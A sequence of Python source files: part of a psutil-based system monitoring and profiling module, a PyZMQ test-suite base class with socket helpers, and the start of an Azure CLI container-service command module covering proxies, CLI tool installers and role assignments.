except Exception as e:
log.exception(e)
finally:
self._interrupt.wait(self._frequency)
def _check_state(self):
pass
class CPUMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
use_interval=False, per_cpu=False, verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=0 if use_interval else frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="cpu_monitoring_")
self._interval = frequency_seconds if use_interval else None
self._per_cpu = per_cpu
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = psutil.cpu_percent(interval=self._interval, percpu=self._per_cpu)
log.log(self._log_level, "[%s] CPU Utilization: %s%%", self._name, percent)
elif self._verbosity > 0:
percent = psutil.cpu_times_percent(interval=self._interval, percpu=self._per_cpu)
log.log(self._log_level, "[%s] CPU Utilization (in percent):\n%s", self._name, percent)
class MemoryMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="memory_monitoring_")
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = system_memory_mb().used_percentage
log.log(self._log_level, "[%s] Memory Usage: %s%%", self._name, percent)
elif self._verbosity == 1:
mem = system_memory_mb()
log.log(self._log_level, "[%s] Memory Usage (in MB): %s", self._name, mem)
elif self._verbosity > 1:
mem = psutil.virtual_memory()
log.log(self._log_level, "[%s] Memory Usage (in Bytes): %s",self._name, mem)
class VolumeMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, root="/",
verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="volume_monitoring_")
self._root = root
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = system_volume_mb(self._root).used_percentage
log.log(self._log_level, "[%s] Disk Usage: %s%%", self._name, percent)
elif self._verbosity == 1:
du = system_volume_mb(self._root)
log.log(self._log_level, "[%s] Disk Usage (in MB): %s", self._name, du)
elif self._verbosity > 1:
du = psutil.disk_usage(self._root)
log.log(self._log_level, "[%s] Disk Usage (in Bytes): %s", self._name, du)
class OSMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
statistics=('cpu', 'memory', 'volume'), verbosity=0, log_level=logging.INFO):
super().__init__(name=name, frequency_seconds=frequency_seconds, check_on_exit=check_on_exit)
self.monitors = []
if 'cpu' in statistics:
self.monitors.append(CPUMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
if 'memory' in statistics:
self.monitors.append(MemoryMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
if 'volume' in statistics:
self.monitors.append(VolumeMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
def _check_state(self):
for monitor in self.monitors:
monitor._check_state()
class MemoryProfiler:
def __init__(self, process=psutil.Process(), enabled=True):
self.ps = process if enabled else None
self.before_mem = None
self.after_mem = None
def __enter__(self):
if self.ps is not None:
self.before_mem = self.ps.memory_full_info()
return self
def __exit__(self, *args):
if self.ps is not None:
self.after_mem = self.ps.memory_full_info()
def usage(self):
if self.ps is not None:
mem = self.after_mem if self.after_mem is not None else self.ps.memory_full_info()
return Namespace(
process_diff=to_mb(mem.uss-self.before_mem.uss),
process=to_mb(mem.uss),
resident_diff=to_mb(mem.rss-self.before_mem.rss),
resident=to_mb(mem.rss),
virtual_diff=to_mb(mem.vms-self.before_mem.vms),
virtual=to_mb(mem.vms)
)
def obj_size(o):
if o is None:
return 0
# handling numpy obj size (nbytes property)
return o.nbytes if hasattr(o, 'nbytes') else sys.getsizeof(o, -1)
def profile(logger=log, log_level=None, duration=True, memory=True):
def decorator(fn):
@wraps(fn)
def profiler(*args, **kwargs):
nonlocal log_level
log_level = log_level or (logging.TRACE if hasattr(logging, 'TRACE') else logging.DEBUG)
if not logger.isEnabledFor(log_level):
return fn(*args, **kwargs)
with Timer(enabled=duration) as t, MemoryProfiler(enabled=memory) as m:
ret = fn(*args, **kwargs)
name = fn_name(fn)
if duration:
logger.log(log_level, "[PROFILING] `%s` executed in %.3fs.", name, t.duration)
if memory:
ret_size = obj_size(ret)
if ret_size > 0:
logger.log(log_level, "[PROFILING] `%s` returned object size: %.3f MB.", name, to_mb(ret_size))
mem = m.usage()
logger.log(log_level, "[PROFILING] `%s` memory change; process: %+.2f MB/%.2f MB, resident: %+.2f MB/%.2f MB, virtual: %+.2f MB/%.2f MB.",
name, mem.process_diff, mem.process, mem.resident_diff, mem.resident, mem.virtual_diff, mem.virtual)
return ret
return profiler
return decorator
|
__init__.py | # Copyright (c) PyZMQ Developers.
# Distributed under the terms of the Modified BSD License.
import sys
import time
from threading import Thread
from unittest import TestCase
try:
from unittest import SkipTest
except ImportError:
from unittest2 import SkipTest
from pytest import mark
import zmq
from zmq.utils import jsonapi
try:
import gevent
from zmq import green as gzmq
have_gevent = True
except ImportError:
have_gevent = False
PYPY = 'PyPy' in sys.version
#-----------------------------------------------------------------------------
# skip decorators (directly from unittest)
#-----------------------------------------------------------------------------
_id = lambda x: x
skip_pypy = mark.skipif(PYPY, reason="Doesn't work on PyPy")
require_zmq_4 = mark.skipif(zmq.zmq_version_info() < (4,), reason="requires zmq >= 4")
#-----------------------------------------------------------------------------
# Base test class
#-----------------------------------------------------------------------------
class BaseZMQTestCase(TestCase):
green = False
teardown_timeout = 10
@property
def Context(self):
if self.green:
return gzmq.Context
else:
return zmq.Context
def socket(self, socket_type):
s = self.context.socket(socket_type)
self.sockets.append(s)
return s
def setUp(self):
super(BaseZMQTestCase, self).setUp()
if self.green and not have_gevent:
raise SkipTest("requires gevent")
self.context = self.Context.instance()
self.sockets = []
def tearDown(self):
contexts = set([self.context])
while self.sockets:
sock = self.sockets.pop()
contexts.add(sock.context) # in case additional contexts are created
sock.close(0)
for ctx in contexts:
t = Thread(target=ctx.term)
t.daemon = True
t.start()
t.join(timeout=self.teardown_timeout)
if t.is_alive():
# reset Context.instance, so the failure to term doesn't corrupt subsequent tests
zmq.sugar.context.Context._instance = None
raise RuntimeError("context could not terminate, open sockets likely remain in test")
super(BaseZMQTestCase, self).tearDown()
def create_bound_pair(self, type1=zmq.PAIR, type2=zmq.PAIR, interface='tcp://10.0.0.7'):
"""Create a bound socket pair using a random port."""
s1 = self.context.socket(type1)
s1.setsockopt(zmq.LINGER, 0)
port = s1.bind_to_random_port(interface)
s2 = self.context.socket(type2)
s2.setsockopt(zmq.LINGER, 0)
s2.connect('%s:%s' % (interface, port))
self.sockets.extend([s1,s2])
return s1, s2
def ping_pong(self, s1, s2, msg):
s1.send(msg)
msg2 = s2.recv()
s2.send(msg2)
msg3 = s1.recv()
return msg3
def ping_pong_json(self, s1, s2, o):
if jsonapi.jsonmod is None:
raise SkipTest("No json library")
s1.send_json(o)
o2 = s2.recv_json()
s2.send_json(o2)
o3 = s1.recv_json()
return o3
def ping_pong_pyobj(self, s1, s2, o):
s1.send_pyobj(o)
o2 = s2.recv_pyobj()
s2.send_pyobj(o2)
o3 = s1.recv_pyobj()
return o3
def assertRaisesErrno(self, errno, func, *args, **kwargs):
try:
func(*args, **kwargs)
except zmq.ZMQError as e:
self.assertEqual(e.errno, errno, "wrong error raised, expected '%s' \
got '%s'" % (zmq.ZMQError(errno), zmq.ZMQError(e.errno)))
else:
self.fail("Function did not raise any error")
def _select_recv(self, multipart, socket, **kwargs):
"""call recv[_multipart] in a way that raises if there is nothing to receive"""
if zmq.zmq_version_info() >= (3,1,0):
# zmq 3.1 has a bug, where poll can return false positives,
# so we wait a little bit just in case
# See LIBZMQ-280 on JIRA
time.sleep(0.1)
r,w,x = zmq.select([socket], [], [], timeout=kwargs.pop('timeout', 5))
assert len(r) > 0, "Should have received a message"
kwargs['flags'] = zmq.DONTWAIT | kwargs.get('flags', 0)
recv = socket.recv_multipart if multipart else socket.recv
return recv(**kwargs)
def recv(self, socket, **kwargs):
"""call recv in a way that raises if there is nothing to receive"""
return self._select_recv(False, socket, **kwargs)
def recv_multipart(self, socket, **kwargs):
"""call recv_multipart in a way that raises if there is nothing to receive"""
return self._select_recv(True, socket, **kwargs)
class PollZMQTestCase(BaseZMQTestCase):
pass
class GreenTest:
"""Mixin for making green versions of test classes"""
green = True
teardown_timeout = 10
def assertRaisesErrno(self, errno, func, *args, **kwargs):
if errno == zmq.EAGAIN:
raise SkipTest("Skipping because we're green.")
try:
func(*args, **kwargs)
except zmq.ZMQError:
e = sys.exc_info()[1]
self.assertEqual(e.errno, errno, "wrong error raised, expected '%s' \
got '%s'" % (zmq.ZMQError(errno), zmq.ZMQError(e.errno)))
else:
self.fail("Function did not raise any error")
def tearDown(self):
contexts = set([self.context])
while self.sockets:
sock = self.sockets.pop()
contexts.add(sock.context) # in case additional contexts are created
sock.close()
try:
gevent.joinall(
[gevent.spawn(ctx.term) for ctx in contexts],
timeout=self.teardown_timeout,
raise_error=True,
)
except gevent.Timeout:
raise RuntimeError("context could not terminate, open sockets likely remain in test")
def skip_green(self):
raise SkipTest("Skipping because we are green")
def skip_green(f):
def skipping_test(self, *args, **kwargs):
if self.green:
raise SkipTest("Skipping because we are green")
else:
return f(self, *args, **kwargs)
return skipping_test
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
